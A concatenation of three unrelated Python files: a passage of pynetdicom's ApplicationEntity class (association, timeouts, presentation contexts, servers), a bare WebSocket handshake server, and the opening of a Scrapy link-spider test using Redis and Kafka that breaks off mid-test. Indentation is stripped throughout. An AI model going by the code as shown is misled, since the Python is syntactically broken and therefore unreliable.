* :class:`~SOPClassExtendedNegotiation` (0 to N items)
* :class:`~UserIdentityNegotiation` (0 or 1 item)
bind_address : 2-tuple, optional
The (host, port) to bind the association's communication socket
to, default ``("127.0.0.1", 0)``.
tls_args : 2-tuple, optional
If TLS is required then this should be a 2-tuple containing a
(`ssl_context`, `server_hostname`), where `ssl_context` is the
:class:`ssl.SSLContext` instance to use to wrap the client socket
and `server_hostname` is the value to use for the corresponding
keyword argument in :meth:`~ssl.SSLContext.wrap_socket`. If no
`tls_args` is supplied then TLS will not be used (default).
evt_handlers : list of 2- or 3-tuple, optional
A list of (*event*, *handler*) or (*event*, *handler*, *args*),
where `event` is an ``evt.EVT_*`` event tuple, `handler` is a
callable function that will be bound to the event and `args` is a
:class:`list` of objects that will be passed to `handler` as
optional extra arguments. At a minimum, `handler` should take an
:class:`~pynetdicom.events.Event` parameter and may return or yield
objects depending on the exact event that the handler is bound to.
For more information see the :ref:`documentation<user_events>`.
Returns
-------
assoc : association.Association
If the association was established then a running
:class:`~pynetdicom.association.Association` thread, otherwise
returns a thread that hasn't been started.
Raises
------
RuntimeError
If called with no requested presentation contexts (i.e. `contexts`
has not been supplied and
:attr:`~pynetdicom.ae.ApplicationEntity.requested_contexts` is
empty).
"""
if not isinstance(addr, str):
raise TypeError("'addr' must be a valid IPv4 string")
if not isinstance(port, int):
raise TypeError("'port' must be a valid port number")
# Association
assoc = Association(self, MODE_REQUESTOR)
# Set the thread name
timestamp = datetime.strftime(datetime.now(), "%Y%m%d%H%M%S")
assoc.name = f"RequestorThread@{timestamp}"
# Setup the association's communication socket
sock = self._create_socket(assoc, bind_address, tls_args)
assoc.set_socket(sock)
# Association Acceptor object -> remote AE
# `ae_title` validation is performed by the ServiceUser
assoc.acceptor.ae_title = ae_title
assoc.acceptor.address = addr
assoc.acceptor.port = port
# Association Requestor object -> local AE
assoc.requestor.address = sock.get_local_addr()
assoc.requestor.port = bind_address[1]
assoc.requestor.ae_title = self.ae_title
assoc.requestor.maximum_length = max_pdu
assoc.requestor.implementation_class_uid = self.implementation_class_uid
assoc.requestor.implementation_version_name = self.implementation_version_name
for item in ext_neg or []:
assoc.requestor.add_negotiation_item(item)
# Requestor's presentation contexts
contexts = contexts or self.requested_contexts
self._validate_requested_contexts(contexts)
# PS3.8 Table 9.11, an A-ASSOCIATE-RQ must contain one or more
# Presentation Context items
if not contexts:
raise RuntimeError(
"At least one requested presentation context is required "
"before associating with a peer"
)
# Set using a copy of the original to play nicely
contexts = deepcopy(contexts)
# Add the context IDs
for ii, context in enumerate(contexts):
context.context_id = 2 * ii + 1
assoc.requestor.requested_contexts = contexts
# Bind events to the handlers
evt_handlers = evt_handlers or []
for evt_hh_args in evt_handlers:
assoc.bind(*evt_hh_args)
# Send an A-ASSOCIATE request to the peer and start negotiation
assoc.request()
# If the result of the negotiation was acceptance then start up
# the Association thread
if assoc.is_established:
assoc.start()
return assoc
def _create_socket(
self,
assoc: Association,
address: Tuple[str, int],
tls_args: Optional[Tuple[SSLContext, str]],
) -> AssociationSocket:
"""Create an :class:`~pynetdicom.transport.AssociationSocket` for the
current association.
.. versionadded:: 1.5
"""
sock = AssociationSocket(assoc, address=address)
sock.tls_args = tls_args
return sock
@property
def connection_timeout(self) -> Optional[float]:
"""Get or set the connection timeout (in seconds).
.. versionadded:: 2.0
Parameters
----------
value : int, float or None
The maximum amount of time (in seconds) to wait for a TCP
connection to be established. A value of ``None`` (default) means
no timeout. The value is passed to `socket.settimeout()
<https://docs.python.org/3/library/
socket.html#socket.socket.settimeout>`_
and is only used during the connection phase of an association
request.
"""
return self._connection_timeout
@connection_timeout.setter
def connection_timeout(self, value: Optional[float]) -> None:
"""Set the connection timeout."""
if value is None:
self._connection_timeout = None
# Explicitly excluding zero - this would make the socket non-blocking
elif isinstance(value, (int, float)) and value > 0:
self._connection_timeout = value
else:
LOGGER.warning("connection_timeout set to None")
self._connection_timeout = None
for assoc in self.active_associations:
assoc.connection_timeout = self.connection_timeout
@property
def dimse_timeout(self) -> Optional[float]:
"""Get or set the DIMSE timeout (in seconds).
Parameters
----------
value : int, float or None
The maximum amount of time (in seconds) to wait for DIMSE related
messages. A value of ``None`` means no timeout (default: ``30``).
"""
return self._dimse_timeout
@dimse_timeout.setter
def dimse_timeout(self, value: Optional[float]) -> None:
"""Set the DIMSE timeout in seconds."""
if value is None:
self._dimse_timeout = None
elif isinstance(value, (int, float)) and value >= 0:
self._dimse_timeout = value
else:
LOGGER.warning("dimse_timeout set to 30 s")
self._dimse_timeout = 30
for assoc in self.active_associations:
assoc.dimse_timeout = self.dimse_timeout
@property
def implementation_class_uid(self) -> UID:
"""Get or set the *Implementation Class UID* as
:class:`~pydicom.uid.UID`.
Parameters
----------
value : str or pydicom.uid.UID
The association request's *Implementation Class UID* value.
"""
return self._implementation_uid
@implementation_class_uid.setter
def implementation_class_uid(self, value: str) -> None:
"""Set the *Implementation Class UID* used in association requests."""
uid = cast(UID, set_uid(value, "implementation_class_uid", False, False, True))
# Enforce conformance on users
if not uid.is_valid:
raise ValueError(f"Invalid 'implementation_class_uid' value '{uid}'")
self._implementation_uid = uid
@property
def implementation_version_name(self) -> Optional[str]:
"""Get or set the *Implementation Version Name* as :class:`str`.
Parameters
----------
value : str or None
If set then an *Implementation Version Name* item with the
corresponding value will be added to the association request,
otherwise no item will be sent.
Returns
-------
str or None
The set *Implementation Version Name*.
"""
return self._implementation_version
@implementation_version_name.setter
def implementation_version_name(self, value: Optional[str]) -> None:
"""Set the *Implementation Version Name*"""
# We allow None, but not an empty str
if isinstance(value, str) and not value:
raise ValueError(
"Invalid 'implementation_version_name' value - must not be "
"an empty str"
)
self._implementation_version = set_ae(value, "implementation_version_name")
def make_server(
self,
address: Tuple[str, int],
ae_title: Optional[str] = None,
contexts: Optional[ListCXType] = None,
ssl_context: Optional[SSLContext] = None,
evt_handlers: Optional[List[EventHandlerType]] = None,
server_class: Optional[Type[_T]] = None,
**kwargs: Any,
) -> Union[_T, ThreadedAssociationServer]:
"""Return an association server.
.. versionadded:: 1.5
Allows the use of a custom association server class.
Accepts the same parameters as :meth:`start_server`. Additional keyword
parameters are passed to the constructor of `server_class`.
.. versionchanged:: 2.0
`ae_title` should now be :class:`str`
Parameters
----------
server_class : object, optional
The class object to use when creating the server. Defaults to
:class:`~pynetdicom.transport.AssociationServer` if not used.
Returns
-------
object
The object passed via `server_class` or the
:class:`~pynetdicom.transport.AssociationServer`.
"""
# If the SCP has no supported SOP Classes then there's no point
# running as a server
unrestricted = _config.UNRESTRICTED_STORAGE_SERVICE
if not unrestricted and not contexts and not self.supported_contexts:
msg = "No supported Presentation Contexts have been defined"
LOGGER.error(msg)
raise ValueError(msg)
ae_title = ae_title if ae_title else self.ae_title
if isinstance(ae_title, bytes):
warnings.warn(
"The use of bytes with 'ae_title' is deprecated, use an "
"ASCII str instead",
DeprecationWarning,
)
ae_title = decode_bytes(ae_title)
ae_title = cast(str, set_ae(ae_title, "ae_title", False, False))
contexts = contexts or self.supported_contexts
bad_contexts = []
for cx in contexts:
roles = (cx.scu_role, cx.scp_role)
if None in roles and roles != (None, None):
bad_contexts.append(cx.abstract_syntax)
if bad_contexts:
msg = (
"The following presentation contexts have inconsistent "
"scu_role/scp_role values (if one is None, both must be):\n "
)
msg += "\n ".join([str(cx) for cx in bad_contexts])
raise ValueError(msg)
server_class = server_class or AssociationServer # type: ignore[assignment]
return server_class( # type: ignore
self,
address,
ae_title,
contexts,
ssl_context,
evt_handlers=evt_handlers or [],
**kwargs,
)
@property
def maximum_associations(self) -> int:
"""Get or set the number of maximum simultaneous associations as
:class:`int`.
Parameters
----------
value : int
The maximum number of simultaneous associations requested by remote
AEs. This does not include the number of associations
requested by the local AE (default ``10``).
"""
return self._maximum_associations
@maximum_associations.setter
def maximum_associations(self, value: int) -> None:
"""Set the number of maximum associations."""
if isinstance(value, int) and value >= 1:
self._maximum_associations = value
else:
LOGGER.warning("maximum_associations set to 1")
self._maximum_associations = 1
@property
def maximum_pdu_size(self) -> int:
"""Get or set the maximum PDU size accepted by the AE as :class:`int`.
Parameters
----------
value : int
The maximum PDU receive size in bytes. A value of ``0`` means the
PDU size is unlimited (default: ``16382``). Increasing this value
or setting it to unlimited is an effective way of improving the
throughput when sending large amounts of data due to the reduced
DIMSE messaging overhead.
"""
return self._maximum_pdu_size
@maximum_pdu_size.setter
def maximum_pdu_size(self, value: int) -> None:
"""Set the maximum PDU size."""
# Bounds and type checking of the received maximum length of the
# variable field of P-DATA-TF PDUs (in bytes)
# * Must be numerical, greater than or equal to 0 (0 indicates
# no maximum length (PS3.8 Annex D.1.1)
if value >= 0:
self._maximum_pdu_size = value
else:
LOGGER.warning(f"maximum_pdu_size set to {DEFAULT_MAX_LENGTH}")
@property
def network_timeout(self) -> Optional[float]:
"""Get or set the network timeout (in seconds).
Parameters
----------
value : int, float or None
The maximum amount of time (in seconds) to wait for network
messages. A value of ``None`` means no timeout (default: ``60``).
"""
return self._network_timeout
@network_timeout.setter
def network_timeout(self, value: Optional[float]) -> None:
"""Set the network timeout."""
if value is None:
self._network_timeout = None
elif isinstance(value, (int, float)) and value >= 0:
self._network_timeout = value
else:
LOGGER.warning("network_timeout set to 60 s")
self._network_timeout = 60
for assoc in self.active_associations:
assoc.network_timeout = self.network_timeout
def remove_requested_context(
self,
abstract_syntax: Union[str, UID],
transfer_syntax: TSyntaxType = None,
) -> None:
"""Remove a requested presentation context.
Depending on the supplied parameters one of the following will occur:
* `abstract_syntax` alone - all contexts with a matching abstract
syntax all be removed.
* `abstract_syntax` and `transfer_syntax` - for all contexts with a
matching abstract syntax; if the supplied `transfer_syntax` list
contains all of the context's requested transfer syntaxes then the
entire context will be removed. Otherwise only the matching transfer
syntaxes will be removed from the context (and the context will
remain with one or more transfer syntaxes).
Parameters
----------
abstract_syntax : str, pydicom.uid.UID or sop_class.SOPClass
The abstract syntax of the presentation context you wish to stop
requesting when sending association requests.
transfer_syntax : UID str or list of UID str, optional
The transfer syntax(es) you wish to stop requesting. If a list of
str/UID then only those transfer syntaxes specified will no longer
be requested. If not specified then the abstract syntax and all
associated transfer syntaxes will no longer be requested (default).
Examples
--------
Remove all requested presentation contexts with an abstract syntax of
*Verification SOP Class* using its UID value.
>>> from pynetdicom import AE
>>> ae = AE()
>>> ae.add_requested_context('1.2.840.10008.1.1')
>>> print(ae.requested_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
=Explicit VR Little Endian
=Explicit VR Big Endian
>>> ae.remove_requested_context('1.2.840.10008.1.1')
>>> len(ae.requested_contexts)
0
Remove all requested presentation contexts with an abstract syntax of
*Verification SOP Class* using the inbuilt
:class:`~pynetdicom.sop_class.Verification` object.
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.add_requested_context(Verification)
>>> ae.remove_requested_context(Verification)
>>> len(ae.requested_contexts)
0
For all requested presentation contexts with an abstract syntax of
*Verification SOP Class*, stop requesting a transfer syntax of
*Implicit VR Little Endian*. If a presentation context exists which
only has a single *Implicit VR Little Endian* transfer syntax then
it will be completely removed, otherwise it will be kept with its
remaining transfer syntaxes.
Presentation context has only a single matching transfer syntax:
>>> from pydicom.uid import ImplicitVRLittleEndian
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae.add_requested_context(Verification, ImplicitVRLittleEndian)
>>> print(ae.requested_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
>>> ae.remove_requested_context(Verification, ImplicitVRLittleEndian)
>>> len(ae.requested_contexts)
0
Presentation context has at least one remaining transfer syntax:
>>> from pydicom.uid import ImplicitVRLittleEndian, ExplicitVRLittleEndian
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.add_requested_context(Verification)
>>> print(ae.requested_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
=Explicit VR Little Endian
=Explicit VR Big Endian
>>> ae.remove_requested_context(
... Verification, [ImplicitVRLittleEndian, ExplicitVRLittleEndian]
... )
>>> print(ae.requested_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Explicit VR Big Endian
"""
abstract_syntax = UID(abstract_syntax)
# Get all the current requested contexts with the same abstract syntax
matching_contexts = [
cntx
for cntx in self.requested_contexts
if cntx.abstract_syntax == abstract_syntax
]
if isinstance(transfer_syntax, str):
transfer_syntax = [transfer_syntax]
if transfer_syntax is None:
# If no transfer_syntax then remove the context completely
for context in matching_contexts:
self._requested_contexts.remove(context)
else:
for context in matching_contexts:
for tsyntax in transfer_syntax:
if tsyntax in context.transfer_syntax:
context.transfer_syntax.remove(UID(tsyntax))
# Only if all transfer syntaxes have been removed then
# remove the context
if not context.transfer_syntax:
self._requested_contexts.remove(context)
def remove_supported_context(
self,
abstract_syntax: Union[str, UID],
transfer_syntax: TSyntaxType = None,
) -> None:
"""Remove a supported presentation context.
Depending on the supplied parameters one of the following will occur:
* `abstract_syntax` alone - the entire supported context will be
removed.
* `abstract_syntax` and `transfer_syntax` - If the supplied
`transfer_syntax` list contains all of the context's supported
transfer syntaxes then the entire context will be removed.
Otherwise only the matching transfer syntaxes will be removed from
the context (and the context will remain with one or more transfer
syntaxes).
Parameters
----------
abstract_syntax : str, pydicom.uid.UID or sop_class.SOPClass
The abstract syntax of the presentation context you wish to stop
supporting.
transfer_syntax : UID str or list of UID str, optional
The transfer syntax(es) you wish to stop supporting. If a list of
str/UID then only those transfer syntaxes specified will no longer
be supported. If not specified then the abstract syntax and all
associated transfer syntaxes will no longer be supported (default).
Examples
--------
Remove the supported presentation context with an abstract syntax of
*Verification SOP Class* using its UID value.
>>> from pynetdicom import AE
>>> ae = AE()
>>> ae.add_supported_context('1.2.840.10008.1.1')
>>> print(ae.supported_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
=Explicit VR Little Endian
=Explicit VR Big Endian
>>> ae.remove_supported_context('1.2.840.10008.1.1')
>>> len(ae.supported_contexts)
0
Remove the supported presentation context with an abstract syntax of
*Verification SOP Class* using the inbuilt
:class:`~pynetdicom.sop_class.Verification` object.
>>> from pynetdicom import AE, VerificationPresentationContexts
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.supported_contexts = VerificationPresentationContexts
>>> ae.remove_supported_context(Verification)
For the presentation contexts with an abstract syntax of
*Verification SOP Class*, stop supporting the *Implicit VR Little
Endian* transfer syntax. If the presentation context only has the
single *Implicit VR Little Endian* transfer syntax then it will be
completely removed, otherwise it will be kept with the remaining
transfer syntaxes.
Presentation context has only a single matching transfer syntax:
>>> from pydicom.uid import ImplicitVRLittleEndian
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.add_supported_context(Verification, ImplicitVRLittleEndian)
>>> print(ae.supported_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
>>> ae.remove_supported_context(Verification, ImplicitVRLittleEndian)
>>> len(ae.supported_contexts)
0
Presentation context has at least one remaining transfer syntax:
>>> from pydicom.uid import ImplicitVRLittleEndian, ExplicitVRLittleEndian
>>> from pynetdicom import AE
>>> from pynetdicom.sop_class import Verification
>>> ae = AE()
>>> ae.add_supported_context(Verification)
>>> print(ae.supported_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
=Explicit VR Little Endian
=Explicit VR Big Endian
>>> ae.remove_supported_context(
... Verification, [ImplicitVRLittleEndian, ExplicitVRLittleEndian]
... )
>>> print(ae.supported_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Explicit VR Big Endian
"""
abstract_syntax = UID(abstract_syntax)
if isinstance(transfer_syntax, str):
transfer_syntax = [transfer_syntax]
# Check abstract syntax is actually present
# we don't warn if not present because by not being present its not
# supported and hence the user's intent has been satisfied
if abstract_syntax in self._supported_contexts:
if transfer_syntax is None:
# If no transfer_syntax then remove the context completely
del self._supported_contexts[abstract_syntax]
else:
# If transfer_syntax then only remove matching syntaxes
context = self._supported_contexts[abstract_syntax]
for tsyntax in transfer_syntax:
if tsyntax in context.transfer_syntax:
context.transfer_syntax.remove(UID(tsyntax))
# Only if all transfer syntaxes have been removed then remove
# the context
if not context.transfer_syntax:
del self._supported_contexts[abstract_syntax]
@property
def requested_contexts(self) -> ListCXType:
"""Get or set a list of the requested
:class:`~pynetdicom.presentation.PresentationContext` items.
Examples
--------
Set the requested presentation contexts using an inbuilt list of
service specific :class:`~pynetdicom.presentation.PresentationContext`
items:
>>> from pynetdicom import AE, StoragePresentationContexts
>>> ae = AE()
>>> ae.requested_contexts = StoragePresentationContexts
Set the requested presentation contexts using a :class:`list` of
:class:`~pynetdicom.presentation.PresentationContext` items:
>>> from pydicom.uid import ImplicitVRLittleEndian
>>> from pynetdicom import AE
>>> from pynetdicom.presentation import PresentationContext
>>> context = PresentationContext()
>>> context.abstract_syntax = '1.2.840.10008.1.1'
>>> context.transfer_syntax = [ImplicitVRLittleEndian]
>>> ae = AE()
>>> ae.requested_contexts = [context]
>>> print(ae.requested_contexts[0])
Abstract Syntax: Verification SOP Class
Transfer Syntax(es):
=Implicit VR Little Endian
Parameters
----------
contexts : list of PresentationContext
The presentation contexts to request when acting as an SCU.
Raises
------
ValueError
If trying to add more than 128 requested presentation contexts.
See Also
--------
ApplicationEntity.add_requested_context
Add a single presentation context to the requested contexts using
an abstract syntax and (optionally) a list of transfer syntaxes.
"""
return self._requested_contexts
@requested_contexts.setter
def requested_contexts(self, contexts: ListCXType) -> None:
"""Set the requested presentation contexts."""
if not contexts:
self._requested_contexts = []
return
self._validate_requested_contexts(contexts)
for context in contexts:
self.add_requested_context(
cast(UID, context.abstract_syntax), context.transfer_syntax
)
@property
def require_called_aet(self) -> bool:
"""Get or set whether the *Called AE Title* must match the AE title.
When an association request is received the value of the 'Called AE
Title' supplied by the peer will be compared with the set values and
if none match the association will be rejected. If the set value
is an empty list then the *Called AE Title* will not be checked.
.. versionchanged:: 1.1
`require_match` changed to ``bool``
Parameters
----------
require_match : bool
If ``True`` then any association requests that supply a
*Called AE Title* value that does not match :attr:`ae_title`
will be rejected. If ``False`` (default) then all association
requests will be accepted (unless rejected for other reasons).
"""
return self._require_called_aet
@require_called_aet.setter
def require_called_aet(self, require_match: bool) -> None:
"""Set whether the *Called AE Title* must match the AE title."""
self._require_called_aet = require_match
@property
def require_calling_aet(self) -> List[str]:
"""Get or set the required calling AE title as a list of :class:`str`.
When an association request is received the value of the *Calling AE
Title* supplied by the peer will be compared with the set value and
if none match the association will be rejected. If the set value
is an empty list then the *Calling AE Title* will not be checked.
.. versionchanged:: 1.1
`ae_titles` changed to :class:`list` of :class:`bytes`
.. versionchanged:: 2.0
`ae_titles` should now be a :class:`list` of :class:`str`
Parameters
----------
ae_titles : list of str
If not empty then any association requests that supply a
*Calling AE Title* value that does not match one of the values in
*ae_titles* will be rejected. If an empty list (default) then all
association requests will be accepted (unless rejected for other
reasons).
"""
return self._require_calling_aet
@require_calling_aet.setter
def require_calling_aet(self, ae_titles: List[str]) -> None:
"""Set the required calling AE title."""
if any([isinstance(v, bytes) for v in ae_titles]):
warnings.warn(
"The use of a list of bytes with 'require_calling_aet' is "
"deprecated, use a list of ASCII str instead",
DeprecationWarning,
)
values = []
for v in ae_titles:
if isinstance(v, bytes):
v = decode_bytes(v)
values.append(cast(str, set_ae(v, "require_calling_aet", False, False)))
self._require_calling_aet = values
def shutdown(self) -> None:
"""Stop any active association servers and threads.
.. versionadded:: 1.2
"""
for assoc in self.active_associations:
assoc.abort()
# This is a bit hackish: server.shutdown() removes the server
# from `_servers` so we need to workaround this
for server in self._servers[:]:
server.shutdown()
self._servers = []
def start_server(
self,
address: Tuple[str, int],
block: bool = True,
ssl_context: Optional[SSLContext] = None,
evt_handlers: Optional[List[EventHandlerType]] = None,
ae_title: Optional[str] = None,
contexts: Optional[ListCXType] = None,
) -> Optional[ThreadedAssociationServer]:
"""Start the AE as an association *acceptor*.
.. versionadded:: 1.2
If set to non-blocking then a running
:class:`~pynetdicom.transport.ThreadedAssociationServer`
instance will be returned. This can be stopped using
:meth:`~pynetdicom.transport.AssociationServer.shutdown`.
.. versionchanged:: 1.3
Added `evt_handlers` keyword parameter
.. versionchanged:: 1.4
Added `ae_title` and `contexts` keyword parameters
.. versionchanged:: 1.5
`evt_handlers` now takes a list of 2- or 3-tuples
.. versionchanged:: 2.0
`ae_title` should now be :class:`str`
Parameters
----------
address : Tuple[str, int]
The ``(host: str, port: int)`` to use when listening for incoming
association requests.
block : bool, optional
If ``True`` (default) then the server will be blocking, otherwise
it will start the server in a new thread and be non-blocking.
ssl_context : ssl.SSLContext, optional
If TLS is required then this should the :class:`ssl.SSLContext`
instance to use to wrap the client sockets, otherwise if ``None``
then no TLS will be used (default).
evt_handlers : list of 2- or 3-tuple, optional
A list of (*event*, *handler*) or (*event*, *handler*, *args*),
where `event` is an ``evt.EVT_*`` event tuple, `handler` is a
callable function that will be bound to the event and `args` is a
:class:`list` of objects that will be passed to `handler` as
optional extra arguments. At a minimum, `handler` should take an
:class:`~pynetdicom.events.Event` parameter and may return or yield
objects depending on the exact event that the handler is bound to.
For more information see the :ref:`documentation<user_events>`.
ae_title : str, optional
The AE title to use for the local SCP. If this keyword parameter
is not used then the AE title from the :attr:`ae_title` property
will be used instead (default).
contexts : list of presentation.PresentationContext, optional
The presentation contexts that will be supported by the SCP. If
not used then the presentation contexts in the
:attr:`supported_contexts` property will be used instead (default).
Returns
-------
transport.ThreadedAssociationServer or None
If `block` is ``False`` then returns the server instance, otherwise
returns ``None``.
"""
if block:
# Blocking server
server = self.make_server(
address,
ae_title=ae_title,
contexts=contexts,
ssl_context=ssl_context,
evt_handlers=evt_handlers,
)
self._servers.append(server)
try:
# **BLOCKING**
server.serve_forever()
except KeyboardInterrupt:
server.shutdown()
return None
# Non-blocking server
timestamp = datetime.strftime(datetime.now(), "%Y%m%d%H%M%S")
server = self.make_server(
address,
ae_title=ae_title,
contexts=contexts,
ssl_context=ssl_context,
evt_handlers=evt_handlers,
server_class=ThreadedAssociationServer,
)
thread = threading.Thread(
target=make_target(server.serve_forever), name=f"AcceptorServer@{timestamp}"
)
thread.daemon = True
thread.start()
self._servers.append(server)
return server
def __str__(self) -> str:
"""Prints out the attribute values and status for the AE"""
s = [""]
s.append(f"Application Entity {self.ae_title}")
s.append("")
s.append(" Requested Presentation Contexts:")
if not self.requested_contexts:
s.append("\tNone")
for context in self.requested_contexts:
s.append(f"\t{cast(UID, context.abstract_syntax).name}")
for transfer_syntax in context.transfer_syntax:
s.append(f"\t\t{transfer_syntax.name}")
s.append("")
s.append(" Supported Presentation Contexts:")
if not self.supported_contexts:
s.append("\tNone")
for context in self.supported_contexts:
s.append(f"\t{cast(UID, context.abstract_syntax).name}")
for transfer_syntax in context.transfer_syntax:
s.append(f"\t\t{transfer_syntax.name}")
s.append("")
s.append(f" ACSE timeout: {self.acse_timeout} s")
s.append(f" DIMSE timeout: {self.dimse_timeout} s")
s.append(f" Network timeout: {self.network_timeout} s")
s.append(f" Connection timeout: {self.connection_timeout} s")
s.append("")
if self.require_calling_aet != []:
ae_titles = self.require_calling_aet
s.append((f" Required calling AE title(s): {', '.join(ae_titles)}"))
s.append(f" Require called AE title: {self.require_called_aet}")
s.append("")
# Association information
s.append(
f" Association(s): {len(self.active_associations)}"
f"/{self.maximum_associations}"
)
for assoc in self.active_associations:
s.append(
f"\tPeer: {assoc.remote['ae_title']} on "
f"{assoc.remote['address']}:{assoc.remote['port']}"
)
return "\n".join(s)
@property
def supported_contexts(self) -> ListCXType:
"""Get or set a list of the supported
:class:`~pynetdicom.presentation.PresentationContext` items.
Examples
--------
Set the supported presentation contexts using a list of
``PresentationContext`` items:
>>> from pydicom.uid import ImplicitVRLittleEndian
>>> from pynetdicom import AE
>>> from pynetdicom.presentation import PresentationContext
>>> context = PresentationContext()
>>> context.abstract_syntax = '1.2.840.10008.1.1'
>>> context.transfer_syntax = [ImplicitVRLittleEndian]
>>> ae = AE()
>>> ae.supported_contexts = [context]
Set the supported presentation contexts using an inbuilt list of
service specific :class:`~pynetdicom.presentation.PresentationContext`
items:
>>> from pynetdicom import AE, StoragePresentationContexts
>>> ae = AE()
>>> ae.supported_contexts = StoragePresentationContexts
Parameters
----------
contexts : list of presentation.PresentationContext
The presentation contexts to support when acting as an SCP.
See Also
--------
ApplicationEntity.add_supported_context
Add a single presentation context to the supported contexts using
an abstract syntax and optionally a list of transfer syntaxes.
"""
# The supported presentation contexts are stored internally as a dict
return sorted(
list(self._supported_contexts.values()),
key=lambda cx: cast(UID, cx.abstract_syntax),
)
@supported_contexts.setter
def supported_contexts(self, contexts: ListCXType) -> None:
"""Set the supported presentation contexts using a list."""
if not contexts:
self._supported_contexts = {}
for item in contexts:
if not isinstance(item, PresentationContext):
raise ValueError(
"'contexts' must be a list of PresentationContext items"
)
self.add_supported_context(
cast(UID, item.abstract_syntax), item.transfer_syntax
)
@staticmethod
def _validate_requested_contexts(contexts: ListCXType) -> None:
"""Validate the supplied `contexts`.
Parameters
----------
contexts : list of presentation.PresentationContext
The contexts to validate.
"""
if len(contexts) > 128:
raise ValueError(
"The maximum allowed number of requested presentation "
"contexts is 128"
)
invalid = [ii for ii in contexts if not isinstance(ii, PresentationContext)]
if invalid:
raise ValueError("'contexts' must be a list of PresentationContext items")
|
old_server.py
|
import socket
import threading
import sys
import re
from base64 import b64encode, b64decode
from hashlib import sha1
class Server:
# create socket using TCP
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
# create list of connections, consists
# of 3-tuple of (socket object, address, session_url)
connections = []
# on server class init, bind socket
# to the ip address and port and listen
def __init__(self, ip, port):
self.sock.bind((ip, port))
self.sock.listen(1)
# handles connected socket data
def handler(self, c, a, session_url):
while True:
# a socket sends data to the server
data = c.recv(2048)
print(data)
# print(data.decode("utf-8"))
# c.send(b"Server received message")
# for connection in self.connections:
# # if the socket sending data matches the current
# # connection, don't send that data back to that socket
# if connection[0] != c:
# # if the session_url of the socket sending data
# # matches the session_url of the current connection,
# # send the data to that socket. Otherwise, don't send
# # the data to that socket.
# # This ensures that users with unique session_urls
# # only send data to and receive data from users
# # with matching session_urls
# if connection[2] == session_url:
# connection[0].send(data)
# # if the socket sends a disconnect signal
# if not data:
# print(str(a[0]) + ":" + str(a[1]),
# " disconnected from session", session_url)
# # remove the 3-tuple from the connections list
# self.connections.remove((c, a, session_url))
# # close the connection
# c.close()
# # stop the thread
# break
def run(self):
while True:
# accepts a socket connection
c, a = self.sock.accept()
data = c.recv(1024).decode()
print(data)
websocket_response = (
"HTTP/1.1 101 Switching Protocols",
"Upgrade: websocket",
"Connection: Upgrade",
"Sec-WebSocket-Accept: {key}\r\n\r\n"
)
magic_string = b"258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
key = re.search(
r'Sec-WebSocket-Key:\s+(.*?)[\n\r]+', data).groups()[0].encode()
response_key = b64encode(sha1(key + magic_string).digest())
response = "\r\n".join(websocket_response).format(
key=response_key.decode())
c.send(response.encode())
print(response)
# on connection acceptance, the new socket
# sends the server the client's session_url
# session_url = c.recv(1024)
session_url = "test"
# server starts a thread for the client
cThread = threading.Thread(
target=self.handler, args=(c, a, session_url))
cThread.daemon = True
cThread.start()
# appends the 3-tuple (socket object, address, session_url)
# to the connections list
self.connections.append((c, a, session_url))
# print(self.connections)
print(str(a[0]) + ":" + str(a[1]),
"connected to session")
if __name__ == "__main__":
server = Server("localhost", 10000)
server.run()
|
online.py
|
'''
Online link spider test
'''
from __future__ import print_function
from future import standard_library
standard_library.install_aliases()
from builtins import next
import unittest
from unittest import TestCase
import time
import sys
from os import path
sys.path.append(path.dirname(path.dirname(path.abspath(__file__))))
import scrapy
import redis
from redis.exceptions import ConnectionError
import json
import threading, time
from crawling.spiders.link_spider import LinkSpider
from scrapy.utils.project import get_project_settings
from twisted.internet import reactor
from scrapy.crawler import CrawlerRunner
from kafka import KafkaConsumer
class CustomSpider(LinkSpider):
'''
Overridden link spider for testing
'''
name = "test-spider"
class TestLinkSpider(TestCase):
example_feed = "{\"allowed_domains\":null,\"allow_regex\":null,\""\
"crawlid\":\"abc12345\",\"url\":\"http://dmoztools.net/\",\"expires\":0,\""\
"ts\":1461549923.7956631184,\"priority\":1,\"deny_regex\":null,\""\
"cookie\":null,\"attrs\":null,\"appid\":\"test\",\"spiderid\":\""\
"test-link\",\"useragent\":null,\"deny_extensions\":null,\"maxdepth\":0}"
def setUp(self):
self.settings = get_project_settings()
self.settings.set('KAFKA_TOPIC_PREFIX', "demo_test")
# set up redis
self.redis_conn = redis.Redis(host=self.settings['REDIS_HOST'],
port=self.settings['REDIS_PORT'],
db=self.settings['REDIS_DB'])
try:
self.redis_conn.info()
except ConnectionError:
print("Could not connect to Redis")
# plugin is essential to functionality
sys.exit(1)
# clear out older test keys if any
keys = self.redis_conn.keys("test-spider:*")
for key in keys:
self.redis_conn.delete(key)
# set up kafka to consumer potential result
self.consumer = KafkaConsumer(
"demo_test.crawled_firehose",
bootstrap_servers=self.settings['KAFKA_HOSTS'],
group_id="demo-id",
auto_commit_interval_ms=10,
consumer_timeout_ms=5000,
auto_offset_reset='earliest'
)
time.sleep(1)
def test_crawler_process(self):
runner = CrawlerRunner(self.settings)
d = runner.crawl(CustomSpider)
d.addBoth(lambda _: reactor.stop())
# add crawl to redis
key = "test-spider:dmoztools.net:queue"
